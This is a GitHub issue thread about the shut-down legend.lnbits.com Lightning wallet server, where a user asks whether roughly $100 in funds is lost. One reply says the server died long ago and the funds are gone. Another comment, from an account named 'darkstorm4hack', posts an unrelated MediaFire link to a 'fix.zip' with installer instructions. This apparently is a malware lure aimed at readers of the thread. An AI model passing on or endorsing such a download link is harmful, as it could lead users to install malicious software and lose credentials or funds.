### ISSUE TITLE
Dead legend.lnbits.com server, are funds lost on the service you provided?

### ISSUE THREAD

**Issue by mullojo** [lnbits/lnbits#2648]
**Describe the issue**
For a couple years I've occasionally used the lnbits backend that was provided with the launch of the service at legend.lnbits.com, when I went to check on a balance I had there for a giving project, I see it says the server is dead and no transactions are possible anymore, so it seems this means the funds there, near $100 in value are lost? Is that correct?

Is there another process to reclaim the funds if there was an issue with the service or server?  It would be nice to know what happened and if there is any resolution.

Here is a screen shot of my account there:

<img width="1557" alt="image" src="https://github.com/user-attachments/assets/f9cb3995-9365-4288-9efe-c61081c8e050">

VoidWallet is active! Payments disabled
DEAD SERVER, ONLY FOR EXPORTING TRANSACTION DATA AND LNURLAUTH

LNbits (DEAD SERVER), free and open-source lightning wallet 
LNbits version: 0.12.9

It would be nice to recover the funds, so please give me instructions to do so if it is possible.  If it is not possible, then please share an explanation.  It would be nice to know in the community if funds on the service are no longer considered safe.  It is an acceptable loss amount, but still never great to lose trust in something that looked like a nice service to the bitcoin community.

If there was a hack, please disclose the details to the community, what caused it and how it was resolved and if it is possible to trust or use the service again.

I appreciate the work you guys have done on Lnbits and hope it can be resolved.  Thanks 😊 -Bob

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by bitkarrot** [comment]
Yep, it was ded a long time ago, all funds gone. check the telegram for the updates. 
(p.s. i'm just a messenger, not the admin)
